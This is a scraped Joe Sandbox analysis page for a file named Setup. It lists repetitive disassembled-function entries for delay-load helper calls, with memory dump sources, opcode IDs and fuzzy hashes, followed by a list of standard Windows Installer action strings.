Function 0090D3E1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D3F3

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 3b5d6f69702def1bf832734712d8c3a4651ab46e42f54d325683075ee5ca4dff
Instruction ID: f0bd87c6215b24533afc396bb28a2f117d93711fedf00693beb4e1e2de4dd7c9
Opcode Fuzzy Hash: 3b5d6f69702def1bf832734712d8c3a4651ab46e42f54d325683075ee5ca4dff
Instruction Fuzzy Hash: 69B012813EE001FE710852852C42C37024CE1C8B63330CC1AF401C80C095800C044033

Function 0090D474 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090D3F3

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 1dcb1e734e8d2750270338ffba13f0cd18fb602d8cb5672089e619ae8ddcde52
Instruction ID: 41f647047c648e9ed58ab6f28dfbd519a937870ed37fdbb485097c99c6477394
Opcode Fuzzy Hash: 1dcb1e734e8d2750270338ffba13f0cd18fb602d8cb5672089e619ae8ddcde52
Instruction Fuzzy Hash: 81B012923EE001FD720892882D42D77028CE0CCB22330C82AF605C00C1D5800C064032

Function 0090DA90 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DA41

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: d782739bb524e8d5a42a1582a304d1ec7ba375713460a91638e425f8dc5a7951
Instruction ID: b8fc8212a333d81ae990f1c93ea8e3ad2c6bd1cddec482be2af7bf7a70d9be9b
Opcode Fuzzy Hash: d782739bb524e8d5a42a1582a304d1ec7ba375713460a91638e425f8dc5a7951
Instruction Fuzzy Hash: F6B012913EE041FDB20892C81D02E3B124CE4C4B21330C81EF505C00C0D4C00C461032

Function 0090DA9A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DA41

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 29a2d958945423548466718555a7feeea2c1603f9ead08c1b270efcf918ada1c
Instruction ID: ce62fbabb3145b6308e558c0f8e8df1e805a0a9f3cbb72e500ebe3dd61bfc113
Opcode Fuzzy Hash: 29a2d958945423548466718555a7feeea2c1603f9ead08c1b270efcf918ada1c
Instruction Fuzzy Hash: 02B012813EE101FDB30892C81C03D3B124CE4C4B21330C91FF405C00C0D4C00C891032

Function 0090DADD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DACA

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: a33c2a2788678db3b3e287ca72b199a0a418437d553612d0e26b6adbbd5e6981
Instruction ID: 1f2824937e495a0f1976491d577c1a47f5490f367529aeaa857988c1ac36b409
Opcode Fuzzy Hash: a33c2a2788678db3b3e287ca72b199a0a418437d553612d0e26b6adbbd5e6981
Instruction Fuzzy Hash: 75B012C53BE001FD710892881E42F37114CD1C5B31330CA2EF909C40C0E4C00C044131

Function 0090DAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DACA

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: cc36a5f5499b2e8ec802a97e7d937d9e67f650b82f4554013ae3c2df11456113
Instruction ID: 59ab4c0ec1cb36560b50bf28350e5b619d6b41b50143a9935f385d94430573a9
Opcode Fuzzy Hash: cc36a5f5499b2e8ec802a97e7d937d9e67f650b82f4554013ae3c2df11456113
Instruction Fuzzy Hash: 5EB012813BE101FD724892881E43E37114CD1C4F31330CB2EF509C40C0E4800C440131

Function 0090DA54 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DA41

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 87fef28873e918b0be4912aca7d591bc19059aa5b8cd4dbbde8555e862acdc01
Instruction ID: 4aeb27a1ac611e006f06d98505a9e679264fd7e879b05c7727f077f907e9ef70
Opcode Fuzzy Hash: 87fef28873e918b0be4912aca7d591bc19059aa5b8cd4dbbde8555e862acdc01
Instruction Fuzzy Hash: 1BB012853FE101FDB10892C81D42D3B124CE4C4B21330C82EF805C00C0D4C00C451032

Function 0090DA5E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DA41

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 21759e9ecca1ce7bf9302f8ade08678258289437222bd3e75f99ae234bee1739
Instruction ID: 55972cc280fbab70ed95cdc3da6fb62498cf5952df9b26813960dc2c1ce852b1
Opcode Fuzzy Hash: 21759e9ecca1ce7bf9302f8ade08678258289437222bd3e75f99ae234bee1739
Instruction Fuzzy Hash: 1CB012813FE001FDB10892C85C02E3B138CF4C4B22330CA1FF405C00C4D4C00C451032

Function 0090DB12 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DB09

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ed1b363767c70cc37c406f4ae3da7202e6f8c928ac024ceda479d92a4f70b2f4
Instruction ID: 563591d020cc0e25202e5a19ae541aefd83c11676e75091550b1772d11a53e87
Opcode Fuzzy Hash: ed1b363767c70cc37c406f4ae3da7202e6f8c928ac024ceda479d92a4f70b2f4
Instruction Fuzzy Hash: A6B092812AA201AD620892891C03D36214CE0C4B21320CD1AB415C00C0948008848071

Function 0090DB36 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DB09

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ccac549235d6552dfb7575ac74cd4d6971bddb6d816425bda2cbf7cd622dfff4
Instruction ID: a25086b5a4f7aacb85c60db35260ad49dfd89777b4c0d59134256b48ffb5a289
Opcode Fuzzy Hash: ccac549235d6552dfb7575ac74cd4d6971bddb6d816425bda2cbf7cd622dfff4
Instruction Fuzzy Hash: 1BB092852BA201AD610892891C03D36214CE0C4B21320C91AB805C00C0D48008488031

Function 0090DB72 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DB09

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f43cd21fedefc9b4a15d67331e0295b904d5a4163f6f6b3ecf8ec256ba6e5794
Instruction ID: c9dde39d14a79519815e42cb6585027148be9b92a7e177726a95f561a2480352
Opcode Fuzzy Hash: f43cd21fedefc9b4a15d67331e0295b904d5a4163f6f6b3ecf8ec256ba6e5794
Instruction Fuzzy Hash: 03B012912BE201FE710CD38E1D03D37214CD0C4B21330CC1AF405C00C0D8810C458231

Function 0090DB68 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DB09

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 7f1ec28112540e9f0cdc59b99a01d4300d650439a62b3105fa980dc47586f419
Instruction ID: ab80c2b66037a2fb17ae270e965c69764164f88988366a55bd579a3dfb74bb3d
Opcode Fuzzy Hash: 7f1ec28112540e9f0cdc59b99a01d4300d650439a62b3105fa980dc47586f419
Instruction Fuzzy Hash: EDB092812AA201AE6208A28A1C07D37214CD0C4B21320CD1AF505C00C0988008848131

Function 0090DC09 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0090DBC2

Part of subcall function 0090DFEC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0090E070

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2b033e65bd5c26a54756560a35c2f1a1037db8d0df7a187da60535cf4bc9cacc
Instruction ID: c3f16ec3d4b38b7586ba2a00f57ff4a8b71d62f65d302a4001048e503e765869
Opcode Fuzzy Hash: 2b033e65bd5c26a54756560a35c2f1a1037db8d0df7a187da60535cf4bc9cacc
Instruction Fuzzy Hash: 49B012A136E001BD720C92881D03E37114DE0C4B31330CA3EF505C40C0D8D00D050031

Non-executed Functions

Function 006E33E0 Relevance: 173.2, Strings: 136, Instructions: 3218COMMON

Download Yara Rule

Strings

AI_AppSearchEx, xrefs: 006E7437, 006E745D
RegisterFonts, xrefs: 006E6710
AI_ProcessAccounts, xrefs: 006E7531
Complus, xrefs: 006E433D, 006E6A48
ServiceControl, xrefs: 006E40B1, 006E41F7, 006E6BDA
800, xrefs: 006E3A44
InstallFinalize, xrefs: 006E6E37
RemoveEnvironmentStrings, xrefs: 006E55F1
AI_InstallPrerequisite, xrefs: 006E6FC0
PatchFiles, xrefs: 006E6015
200000, xrefs: 006E6DCD
RemoveFolders, xrefs: 006E5AFD
FileCost, xrefs: 006E379D
MoveFile, xrefs: 006E5DEF
AI_XmlElement, xrefs: 006E70F2, 006E7651
ProcessComponents, xrefs: 006E3B4B
FileSize, xrefs: 006E5FAF
UnpublishComponents, xrefs: 006E3DC6
RemoveShortcuts, xrefs: 006E54AB
UnregisterExtensionInfo, xrefs: 006E4E68
Feature, xrefs: 006E3F6B, 006E6D63
10000, xrefs: 006E6C4D, 006E7844
InstallInitialize, xrefs: 006E6DBA
Font, xrefs: 006E499B, 006E6736
InstallODBC, xrefs: 006E678D, 006E6813, 006E6899
RemoveFiles, xrefs: 006E587D, 006E59C3
3000, xrefs: 006E3DF2, 006E3F38, 006E430A, 006E4AAE, 006E4BF4, 006E4D3A, 006E4E80, 006E4FC6, 006E510C, 006E5624, 006E6397, 006E650E, 006E6932, 006E6A35
6000, xrefs: 006E6591
MsiUnpublishAssemblies, xrefs: 006E3C85
Feature_, xrefs: 006E3CEB, 006E4EE6, 006E6438, 006E6CF7, 006E6EED, 006E6F73, 006E6FF9, 006E7093
AI_XmlUninstall, xrefs: 006E762B, 006E76B1
BindImage, xrefs: 006E6281, 006E62A7
WriteIniValues, xrefs: 006E6604
120000, xrefs: 006E54DE
StartServices, xrefs: 006E6BB4
DuplicateFile, xrefs: 006E579D, 006E61C1
MIME, xrefs: 006E513F, 006E6521
InstallServices, xrefs: 006E6AA8
MsiPublishAssemblies, xrefs: 006E6CBB
InstallValidate, xrefs: 006E3A11
CostFinalize, xrefs: 006E38E8
AI_UninstallAccounts, xrefs: 006E7243
AI_XmlInstall, xrefs: 006E70CC, 006E7149
RemoveExistingProducts, xrefs: 006E3404
UnregisterComPlus, xrefs: 006E42D7
AI_ScheduledTasks, xrefs: 006E75D4
File, xrefs: 006E3803, 006E58E3, 006E5F35
IniFile, xrefs: 006E53CB, 006E6625
Environment, xrefs: 006E5657, 006E66B0
DuplicateFiles, xrefs: 006E615B
RegisterClassInfo, xrefs: 006E6384
AI_ProcessTasks, xrefs: 006E75AE
RegisterComPlus, xrefs: 006E6A22
AI_DefaultActionCost, xrefs: 006E7831
Shortcut, xrefs: 006E551B, 006E6324
1500, xrefs: 006E3B7E, 006E5252, 006E5398, 006E715C, 006E76C4
ServiceInstall, xrefs: 006E6ACE
UnregisterMIMEInfo, xrefs: 006E50D9
5000, xrefs: 006E6294
UnregisterFonts, xrefs: 006E4935
AI_PreRequisite, xrefs: 006E6EDA, 006E6F60, 006E6FE6, 006E706C
2000, xrefs: 006E355C, 006E6617, 006E71D9, 006E7256, 006E72D3, 006E7350, 006E74C7, 006E7544, 006E75C1
MsiAssembly, xrefs: 006E6CE6
150, xrefs: 006E6414
RemoveDuplicateFiles, xrefs: 006E5737
RemoveRegistryValues, xrefs: 006E4A7B, 006E4BC1
Patch, xrefs: 006E607B
MsiConfigureServices, xrefs: 006E6B2E, 006E6B54
SelfRegModules, xrefs: 006E69A5
12000, xrefs: 006E4596, 006E46DC, 006E4822, 006E576A, 006E58B0, 006E5A11, 006E5B30, 006E5C76, 006E6311, 006E67A0, 006E6826, 006E68AC
UnpublishFeatures, xrefs: 006E3F05
RemoveODBC, xrefs: 006E4563, 006E46A9, 006E47EF
WriteRegistryValues, xrefs: 006E657E
20000, xrefs: 006E6BC7
AI_UserGroups, xrefs: 006E72E6, 006E74DA
1500000, xrefs: 006E6ABB
AI_UninstallGroups, xrefs: 006E72C0
Location, xrefs: 006E6F14, 006E6F9A
StopServices, xrefs: 006E404B, 006E4191
30000, xrefs: 006E3CB8, 006E6CD3
8000, xrefs: 006E446B, 006E4968, 006E6723, 006E69B8
SelfReg, xrefs: 006E4483, 006E69CB
Extension, xrefs: 006E4EB3, 006E6427
UnregisterProgIdInfo, xrefs: 006E4F93
PublishFeatures, xrefs: 006E6D3D
RemoveIniFile, xrefs: 006E5285
RemoveIniValues, xrefs: 006E521F, 006E5365
ProgId, xrefs: 006E5014, 006E64A4
RegisterExtensionInfo, xrefs: 006E6401
Component_, xrefs: 006E3E58, 006E40E4, 006E422A, 006E4370, 006E4621, 006E4742, 006E4888, 006E4B1E, 006E4C5A, 006E52B8, 006E53FE, 006E5544, 006E56BE, 006E57D0, 006E5916, 006E5BBB, 006E5CDC, 006E5E22, 006E5F68, 006E61F4, 006E6337, 006E65B7, 006E663D, 006E66C3, 006E67C6, 006E684C, 006E68D2, 006E6958, 006E6A5B, 006E6AE1, 006E6B62, 006E6BED, 006E6C73
AppId, xrefs: 006E4D6D, 006E63AA
CreateFolders, xrefs: 006E5C43
AI_GxUninstall, xrefs: 006E73BA
CostInitialize, xrefs: 006E3663
WriteEnvironmentStrings, xrefs: 006E668A
AI_DownloadPrereq, xrefs: 006E6EB4
InstallFiles, xrefs: 006E5ECF
SelfUnregModules, xrefs: 006E441D
RegisterProgIdInfo, xrefs: 006E647E
15000, xrefs: 006E407E, 006E41C4, 006E5DBC, 006E618E, 006E6B41, 006E6D50
RegisterMIMEInfo, xrefs: 006E64FB
PublishComponents, xrefs: 006E6C3A
100000, xrefs: 006E6E4A
RemoveRegistry, xrefs: 006E4C27
CreateShortcuts, xrefs: 006E62FE
3000000, xrefs: 006E669D
&_', xrefs: 006E33F1
AI_UserAccounts, xrefs: 006E7269, 006E7557
RemoveFile, xrefs: 006E5A29
~, xrefs: 006E702A
AI_ProcessGroups, xrefs: 006E74B4
TypeLib, xrefs: 006E6945
AI_InstallPostPrerequisite, xrefs: 006E7046
Registry, xrefs: 006E4AE1, 006E65A4
Options, xrefs: 006E7020, 006E70A6
AI_GxInstall, xrefs: 006E71C6
AI_CountRowAction, xrefs: 006E77B4
ODBCDataSource, xrefs: 006E45C9, 006E67B3
PublishComponent, xrefs: 006E3E25, 006E6C60
PatchSize, xrefs: 006E60F5
1800, xrefs: 006E70DF, 006E763E
AI_ExtractPrereq, xrefs: 006E6F3A
AI_Game, xrefs: 006E71EC, 006E73E0
100, xrefs: 006E6048, 006E6491, 006E73CD
AppSearch, xrefs: 006E3529, 006E35AA
MoveFiles, xrefs: 006E5D89
AI_XmlAttribute, xrefs: 006E716F, 006E76D7
UnregisterClassInfo, xrefs: 006E4D07
ODBCDriver, xrefs: 006E4855, 006E68BF
500, xrefs: 006E7445
AI_ChainProductsPseudo, xrefs: 006E7737
RegisterTypeLibraries, xrefs: 006E691F
AI_UninstallTasks, xrefs: 006E733D
Component, xrefs: 006E36C9, 006E393D, 006E3A88, 006E3BB1
ODBCTranslator, xrefs: 006E470F, 006E6839
CreateFolder, xrefs: 006E5B63, 006E5CA9

Memory Dump Source

